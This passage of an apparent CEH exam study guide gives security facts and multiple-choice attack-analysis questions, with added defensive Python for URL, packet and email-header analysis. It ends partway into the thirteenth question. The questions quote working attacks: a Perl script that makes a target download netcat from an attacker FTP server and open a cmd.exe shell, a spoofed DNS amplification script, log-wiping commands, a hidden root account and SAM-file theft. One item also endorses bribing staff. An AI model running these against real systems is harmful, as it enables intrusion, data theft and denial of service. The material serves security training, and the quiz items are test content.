328. A false positive occurs when the IDS/IPS system classifies an action as anomalous when it is a legitimate action. A false negative occurs when an actual intrusive action has occurred but the system allows it to pass as non-intrusive behavior.
Social Engineering
329. You will need to enforce the corporate network security policy to resolve issues with employees bypassing the firewall by attaching a modem to their telephone line and workstations.
330. Social engineering can help you bypass a firewall. For example, you can create a web page that users can click on and, upon clicking, a keylogger can be embedded on their system.
331. Social engineering is the act of getting needed information from a person rather than breaking into a system.
332. An example of a phishing attack is when you receive an e-mail asking you to click on a link that takes you to a different site than what is mentioned in the e-mail.
333. The current most common vehicle for social engineering attacks is e-mail.
334. Social engineering is an easy and extremely effective method to gain information.
335. The best way to break into a highly secure system that is virtually impenetrable is to use social engineering tactics like bribing employees with money to provide you with sensitive information.
336. The weakest links in the security chain are untrained staff or ignorant computer users.
337. To determine the first octet of a DWORD encoded URL, divide the number by 16,777,216.
338. Another method of obfuscating URLs is to use hexadecimal equivalents. For example, 0xde = 222.
339. The three stages of reverse social engineering are sabotage, advertising/marketing, and assisting.
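As an added example, not from the study guide, here is a decoder for the obfuscated host forms described in items 337 and 338. Besides the DWORD and hex forms the guide names, it also handles octal and the shortened 2- or 3-part forms that inet_aton accepts, and it reads the host out of a full URL (anything before an @ in the authority is userinfo, not the host). The sample URLs are constructed.

```python
# Added example (not from the study guide): decode the obfuscated host forms
# that items 337 and 338 describe. A DWORD host is split into octets by
# dividing by 16,777,216 (2^24), then 65,536, then 256 (item 337's rule);
# hex (0xC0A80101, 0xC0.0xA8.0x01.0x01) and, beyond what the guide names,
# octal (0300.0250.01.01) and 2- or 3-part forms are handled as inet_aton
# would. Sample URLs in the demo are constructed.
from urllib.parse import urlsplit


def first_octet(dword: int) -> int:
    """Item 337's rule: the first octet is the DWORD divided by 16,777,216."""
    return dword // 16_777_216


def _to_int(token: str) -> int:
    """One numeric token: 0x.. hex, leading-0 octal, otherwise decimal."""
    t = token.lower()
    if t.startswith("0x") and len(t) > 2:
        return int(t[2:], 16)
    if len(t) > 1 and t.startswith("0") and t.isdigit():
        return int(t, 8)
    if t.isdigit():
        return int(t, 10)
    raise ValueError(f"not a numeric token: {token!r}")


def decode_host(host: str) -> str:
    """Dotted-quad form of an obfuscated IPv4 host; DNS names come back unchanged."""
    try:
        nums = [_to_int(p) for p in host.split(".")]
    except ValueError:
        return host                         # contains letters: a real hostname
    if not 1 <= len(nums) <= 4:
        return host
    head, last = nums[:-1], nums[-1]
    fill = 4 - len(head)                    # bytes the last part has to supply
    if any(not 0 <= x <= 255 for x in head) or not 0 <= last < 256 ** fill:
        raise ValueError(f"value out of range in {host!r}")
    # peel the last part into 'fill' octets, most significant first
    tail = [(last >> (8 * i)) & 0xFF for i in reversed(range(fill))]
    return ".".join(str(o) for o in head + tail)


def real_host(url: str) -> str:
    """Host a browser would actually connect to, with the obfuscation removed."""
    host = urlsplit(url).hostname or ""     # .hostname drops any user@ prefix
    return decode_host(host)


if __name__ == "__main__":
    # constructed sample URLs
    for url in ("http://3232235777/", "http://0xC0A80101/",
                "http://www.example.com@3232235777/login"):
        print(url, "->", real_host(url))
```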
Physical Security
340. Piggybacking (also called tailgating) is when someone walks in behind an authorized user to gain access into a building.
341. RFID tags are often used to manage inventory, but they could leak sensitive information, so they should be disabled when the tags are no longer needed. Use RFID kill switches in RFID chips to disable RFID tags when they are no longer needed.
Attack Analysis
Attack #1
# rm rootkit.c
# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sbin/named
  359 ?  00:00:00 inetd
# ps -aux | grep portmap
# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sbin/named
  359    00:00:00 inetd
What is the attacker trying to do?
A. Cover his/her tracks
B. Port scan
C. Escalate privileges
D. Man-in-the-middle attack
Attack #2
GET /msadc/…../…../…../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.mspowerpoint, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)
Host: lib.bvxttrip.org
Connection: Keep-Alive
Cookie: ASPSESSIONIDGQQQQQZU=KNOHEMW
What type of attack is being performed?
A. SQL injection
B. Firewalking
C. Directory Traversal
D. Cross-site scripting
Attack #3
A screen pops up on your screen with the following message:
Message from SYSTEM to ALERT on 7/19/2005 6:00:03 PM
STOP! WINDOWS REQUIRES IMMEDIATE ATTENTION. Windows has found Critical Errors. To fix the errors please do the following:
1. Download Registry Repair from http://www.repairreg.com
2. Install Registry Repair
3. Run Registry Repair
4. Reboot your computer
FAILURE TO ACT NOW MAY LEAD TO DATA LOSS AND CORRUPTION
What could cause this message?
A. Windows messenger SPAM
B. MyDoom virus
C. Beast Trojan
D. Denial of Service attack
Attack #4
You receive 91 ICMP_ECHO packets within 90 minutes from 47 different sites. 77 of the ICMP_ECHO packets have ICMP ID: 39612 and Seq: 57072. 13 of the ICMP_ECHO packets have ICMP ID: 0 and Seq: 0.
What does this mean?
A. Attacker is using NAT.
B. Attacker modified TCP/IP stack on the attacking system.
C. 77 packets are from a single subnet while 13 of the packets are from a different subnet.
D. ICMP ID and Sequence numbers are set by a tool and not the operating system.
Attack #5
Log entry: 1/19-13:22:01:44:812319 192.168.145.98:21 -> 200.100.50.25:4214 TCP TTL:63 TOS:0x10 ID:11842 DF
What service is being exploited?
A. SMTP
B. FTP
C. WWW
D. SQL
Attack #6
mkdir -p /etc/X11/appInk/Internet/.etc
mkdir -p /etc/X11/appInk/Internet/.etcpasswd
touch -acmr /etc/passwd /etc/X11/AppInk/Internet/.etcpasswd
passwd nobody -d
/usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash
passwd dns -d
touch -acmr /etc/X11/appInk/Internet/.etcpasswd /etc/passwd
touch -acmr /etc/X11/appInk/Internet/.etc /etc
Is the attacker trying to change the password of an account?
How many accounts are being manipulated?
Attack #7
12/09-01:22:31.167035 207.219.240:1882 -> 172.16.1.104:21 TCP TTL:50 TOS:0x0 ID:53476 DF
*****PA* Seq: 0x33BC72AD Ack: 0x110CE81E Win: 0x7D78
TCP Options => NOP NOP TS: 126045057 105803098
50 41 53 53 20 90 90 90 90 90 90 90 90 90 90   PASS ..........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ...............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ...............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ...............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ...............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ...............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ...............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ...............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ...............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ...............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ...............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ...............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ...............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ...............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ...............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ...............
Hacker University
Page 32
C|EH Study Guide =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= 12/09-01:22:31.169534 172.16.1.104:21 -> 207.219.207.240:1882 TCP TTL: 63 TOS: 0x10 ID: 48231 DF *****PA* Seq: 0x110CE81E Ack: 0x33BC7446 Win: 0x7D78 TCP Options => NOP NOP TS: 105803113 126045057 35 33 30 20 4C 6F 67 69 6E 20 69 6E 63 6F 72 72 530 Login Incorr 65 63 74 2E 0D 0A
etc…
Was the attacker successful?
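The capture above is the classic shape of an FTP PASS buffer overflow: a valid command verb followed by a long argument that starts with a run of 0x90 (x86 NOP) bytes, and a server reply that tells you whether the login path even got that far. The code below is an added example, not part of the study guide: it parses the Snort-style hex columns back into bytes (the first lines of the dump are embedded as constructed input), measures the NOP run in the command argument the way the nops-x86 signature does, and reads the three-digit reply code. Real sleds can use other single-byte instructions, so treat the 0x90 run as one heuristic among several, not a definition of "overflow".

```python
import re

# First rows of the client payload and the server reply from the capture above,
# constructed in the same "hex columns, then ASCII" layout Snort prints.
CLIENT_DUMP = """\
50 41 53 53 20 90 90 90 90 90 90 90 90 90 90   PASS ..........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ...............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ...............
"""
SERVER_DUMP = """\
35 33 30 20 4C 6F 67 69 6E 20 69 6E 63 6F 72 72   530 Login incorr
65 63 74 2E 0D 0A                                  ect...
"""

HEX_CHARS = set("0123456789abcdefABCDEF")
FTP_CMD = re.compile(rb"^(USER|PASS|CWD|MKD|RNTO|STOR|RETR|LIST|SITE) ", re.I)


def parse_hexdump(dump):
    """Rebuild payload bytes from dump rows: read two-character hex tokens from the
    left and stop at the first token that is not one (the ASCII column)."""
    data = bytearray()
    for line in dump.splitlines():
        for tok in line.split():
            if len(tok) == 2 and set(tok) <= HEX_CHARS:
                data.append(int(tok, 16))
            else:
                break
    return bytes(data)


def longest_run(data, value=0x90):
    """Length of the longest consecutive run of `value` in data."""
    best = run = 0
    for b in data:
        run = run + 1 if b == value else 0
        best = max(best, run)
    return best


def inspect_ftp_payload(data, sled_threshold=32, arg_threshold=256):
    """Classify one client payload: which FTP verb, argument length, NOP run, verdict.
    Returns None when the payload does not start with a known verb."""
    m = FTP_CMD.match(data)
    if not m:
        return None
    arg = data[m.end():]
    run = longest_run(arg)
    return {
        "command": m.group(1).decode().upper(),
        "arg_len": len(arg),
        "nop_run": run,
        "suspicious": len(arg) >= arg_threshold or run >= sled_threshold,
    }


def ftp_reply_code(data):
    """Three-digit FTP reply code at the start of a server payload, or None."""
    m = re.match(rb"^(\d{3})[ -]", data)
    return int(m.group(1)) if m else None


if __name__ == "__main__":
    print(inspect_ftp_payload(parse_hexdump(CLIENT_DUMP)))
    print("server replied", ftp_reply_code(parse_hexdump(SERVER_DUMP)))
```

On the embedded rows the verdict is suspicious with a 40-byte NOP run, and the reply parses to 530, the "login incorrect" code, which is the evidence the question asks for: the daemon processed the oversized PASS as a failed login rather than crashing or executing the payload.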
Attack #8
############################################
$port = 53;                 # Spawn cmd.exe on port X
$your = "192.168.1.1";      # Your FTP server
$user = "Anonymous";        # login as
$pass = '[email protected]';  # password
############################################
$host = $ARGV[0];
print "Starting...\n";
print "Server will download the file nc.exe from $your FTP server.\n";
system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
print "Server is downloading...\n";
system("perl msadc.pl -h $host -C \"ftp -s:sasfile\"");
print "Press ENTER when download is finished .. (That's why it's good to have your own ftp server)\n";
$o = <STDIN>;
print "Opening...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
print "Done.\n";
#system("telnet $host $port");
exit(0);

What does this code do?
A. Creates a share called sasfile
B. Creates a backdoor account
C. Opens a telnet listener that requires no username or password
D. Creates a FTP server
Attack #9
use Net::DNS;
use Net::RawIP;

open(LIST, "ns.list");
@list = <LIST>;
close LIST;
chomp(@list);
my $lnum = @list;
my $i = 0;
my $loop = 0;

if ($ARGV[0] eq '') {
    print "Usage: ./hackme.pl <spoofed source IP> <loops>\n";
    exit(0);
}
while ($loop < $ARGV[1]) {
    while ($i < $lnum) {
        my $source  = $ARGV[0];
        my $dnspkt  = new Net::DNS::Packet("google.com", "ANY");
        my $pktdata = $dnspkt->data;
        my $sock    = new Net::RawIP({udp => {}});
        $sock->set({
            ip  => { saddr => $source, daddr => $list[$i], frag_off => 0, tos => 0, id => 1565 },
            udp => { source => 53, dest => 53, data => $pktdata },
        });
        $sock->send;
        $i++;
    }
    $loop++;
    $i = 0;
}
exit(0);

What type of attack is this?
A. DNS lookup attacks
B. DNS reflection and amplification attack
C. FTP DOS
D. FTP backdoor
Attack #10
C:\> cmd /c type c:\winnt\repair\sam > c:\file.txt
 Volume in drive C has no label.
 Volume Serial Number is 3105-51BF
 Directory of C:\
 3/14/04  04:12a            0  AUTOEXEC.BAT
 3/14/04  8:01a           322  boot.ini
 3/14/05  12:44p    <DIR>      WINNT
 3/14/05  12:10p    <DIR>      TEMP
            1,221,095,103 bytes free
C:\>type file.txt
C:\>copy file.txt c:\inetpub\wwwroot
C:\>GET file.txt HTTP/1.1
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 15:44:12 GMT
ETag: "9814ed8abc83103:8ff"
Content-Length: 5131

What is the hacker trying to steal?
A. file.txt
B. index.html
C. sam.txt
D. cmd.exe
Attack #11
Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558

What type of attack is this?
A. Unsuccessful port scan
B. The hacker has a backdoor into the compromised system
C. A DNS poisoning attack
D. An unsuccessful WEP attack
Attack #12
Below is the header of a spoofed e-mail found on the Internet. What is the IP address of the true source?

Return-Path:
Received: from smtp.com (fw.emumail.com [215.52.220.122])
        by raq-221-181.ev1.net (8.10.2/8.10.2) with ESMTP id h78NIn404807
        for ; Sat, 9 Aug 2003 18:18:50 -0500
Received: (qmail 12685 invoked from network); 8 Aug 2003 23:25:25 -0000
Received: from ([19.25.19.10]) by smtp.com with SMTP
Received: from unknown (HELO CHRISLAPTOP) (168.150.84.123)
        by localhost with SMTP; 8 Aug 2003 23:25:01 -0000
From: "Bill Gates"
To: "mikeg"
Subject: We need your help!
Date: Fri, 8 Aug 2003 19:12:28 -0400
Message-ID:
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_0052_01C35DE1.03202950"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Importance: Normal
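Each relay prepends its own Received line, so the chain reads top-down from the last hop to the first and the sender's address is in the bottom-most line that names one. The block below is an added example, not from the study guide: it unfolds the headers, parses every Received line into its from and by parts (with the HELO name where present), and walks the chain from the bottom. The header text is constructed from the listing above with the mailbox addresses the listing omits left out. The caveat a practitioner wants: a sender can forge any Received lines below the first one written by a relay you trust, so the bottom-most IP is the true source only when the hop above it is believed.

```python
import re

# Constructed from the Received chain above; addresses that the listing omits are left out.
SAMPLE_HEADERS = """\
Received: from smtp.com (fw.emumail.com [215.52.220.122])
        by raq-221-181.ev1.net (8.10.2/8.10.2) with ESMTP id h78NIn404807;
        Sat, 9 Aug 2003 18:18:50 -0500
Received: (qmail 12685 invoked from network); 8 Aug 2003 23:25:25 -0000
Received: from ([19.25.19.10]) by smtp.com with SMTP
Received: from unknown (HELO CHRISLAPTOP) (168.150.84.123)
        by localhost with SMTP; 8 Aug 2003 23:25:01 -0000
Subject: We need your help!
Date: Fri, 8 Aug 2003 19:12:28 -0400
X-Mailer: Microsoft Outlook, Build 10.0.2627

body starts here and is ignored
"""

IPV4 = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")
FROM_BY = re.compile(r"^from\s+(?P<from>.*?)\s+by\s+(?P<by>\S+)", re.I | re.S)
HELO = re.compile(r"\(HELO\s+([^)\s]+)\)", re.I)


def unfold(raw):
    """RFC 5322 unfolding: a line starting with whitespace continues the previous header.
    Stops at the first blank line (end of the header block)."""
    headers = []
    for line in raw.splitlines():
        if not line.strip():
            break
        if line[:1] in " \t" and headers:
            headers[-1] += " " + line.strip()
        else:
            headers.append(line.rstrip())
    return headers


def received_chain(raw):
    """Received hops in header order: index 0 is the last relay, the final entry the first."""
    hops = []
    for h in unfold(raw):
        if not h.lower().startswith("received:"):
            continue
        body = h[len("received:"):].strip()
        m = FROM_BY.match(body)
        from_part = m.group("from") if m else ""
        helo = HELO.search(from_part)
        hops.append({
            "from": from_part,
            "by": m.group("by") if m else "",
            "helo": helo.group(1) if helo else None,
            "ips": IPV4.findall(from_part),
        })
    return hops


def originating_ip(raw):
    """Bottom-most hop that records a connecting IP; None if no hop does."""
    for hop in reversed(received_chain(raw)):
        if hop["ips"]:
            return hop["ips"][0]
    return None


if __name__ == "__main__":
    for i, hop in enumerate(received_chain(SAMPLE_HEADERS)):
        print(i, hop["ips"], "by", hop["by"], "helo", hop["helo"])
    print("originating IP:", originating_ip(SAMPLE_HEADERS))
```

For the listing above this yields 168.150.84.123, logged by localhost against a host that announced itself as CHRISLAPTOP with no reverse name ("from unknown"); the "Bill Gates" From line and the emumail.com relay above it are what the spoof wants you to look at.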
Attack #13
The following code is vulnerable to what type of attack?